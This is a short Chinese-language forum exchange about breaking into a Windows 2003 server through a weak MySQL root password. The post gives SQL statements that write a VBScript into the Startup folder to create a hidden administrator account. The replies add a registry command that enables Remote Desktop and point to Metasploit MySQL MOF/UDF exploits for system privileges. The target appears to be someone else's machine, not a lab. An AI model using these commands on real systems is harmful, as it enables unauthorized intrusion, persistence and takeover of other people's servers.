| 80端口只有Apache web server 页面不知道网站路径。 win 03的主机 mysql version:4.0.13-nt 是root权限 apache 版本:apache httpd 2.0.48 3306端口开了外连.并且是弱口令,已经知道了帐号/密码 开的端口有 135.445.1026.80.256.3306 mysql>insert into a values (“set wshshell=createobject (“”wscript.shell”" ) ” ); mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1/add”",0) ” ); mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators 1 /add”",0) ” ); mysql>select * from a into outfile “c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动 \\a.vbs”; 目前已经写进了启动项 有两个问题:问一下开3389的命令? 如何让对方重启? 2000和03都可以用 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 命令来开3389 你为何不直接用MSF打,直接系统权限 求姿势。对msf半知半解 是生成的payload 转换成16进制 然后在放启动项里吗? msf>search mysql……………………. 里面有mof和udf的exploit 你既然连上mysql了也可以手工mof或udf |
-
上一篇: 一次失败的”写权限变立即执行”尝试 - 网站安
下一篇: 天生创想OA存储型xss(可打任意账户) - 网站安全
还没有人抢沙发呢~